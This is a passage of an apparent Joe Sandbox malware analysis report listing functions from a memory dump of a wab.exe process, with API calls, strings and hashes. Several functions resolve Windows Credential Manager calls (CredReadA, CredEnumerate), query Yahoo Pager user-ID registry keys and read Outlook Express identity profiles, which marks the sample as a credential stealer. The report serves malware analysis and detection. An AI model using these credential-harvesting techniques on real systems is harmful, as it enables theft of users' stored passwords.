                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F057 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                          • String ID: Passport.Net\*
                                                                                                                                                                                                          • API String ID: 2329438634-3671122194
                                                                                                                                                                                                          • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                          • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004032A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                          • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                                            • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                                            • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                          • String ID: Personalities
                                                                                                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                                                                                                          • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                          • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004101D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                                                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                          • API String ID: 2859077140-3316789007
                                                                                                                                                                                                          • Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                          • Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00443A35 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                          • API String ID: 1830152886-1703613266
                                                                                                                                                                                                          • Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                          • Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040900D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00409031
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                                                                          • {?@ UD, xrefs: 0040900D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                                                                          • API String ID: 408644273-2682877464
                                                                                                                                                                                                          • Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                          • Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406B15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                          • API String ID: 1670431679-1552265934
                                                                                                                                                                                                          • Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                          • Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410909 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,764771C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                          • API String ID: 145871493-1506664499
                                                                                                                                                                                                          • Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                          • Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0043D438 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 478COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID: $no query solution
                                                                                                                                                                                                          • API String ID: 368790112-326442043
                                                                                                                                                                                                          • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                          • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0043000F Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                                          • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                          • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0043CB52 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                                                                                                          • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                          • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041D3D8 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                                          • API String ID: 231171946-3708268960
                                                                                                                                                                                                          • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                          • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00424D44 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 173COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                          • API String ID: 3510742995-3170954634
                                                                                                                                                                                                          • Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                          • Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413F5C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: winWrite1$winWrite2
                                                                                                                                                                                                          • API String ID: 438689982-3457389245
                                                                                                                                                                                                          • Opcode ID: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                          • Instruction ID: 411cc920c71d47ae3c136763a4be7e00f30539a89a3c59ace8e577baf045dca9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9417F72A00209EBDF00CF95CC41ADE7BB5FF48315F14452AF614A7280D778DAA5CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413E34 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: winRead
                                                                                                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                                                                                                          • Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                          • Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A8C2 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                                                                            • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                          • API String ID: 3337535707-2769808009
                                                                                                                                                                                                          • Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                          • Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040717E Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 125969286-0
                                                                                                                                                                                                          • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                          • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408E21 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                          • Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                                          • Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
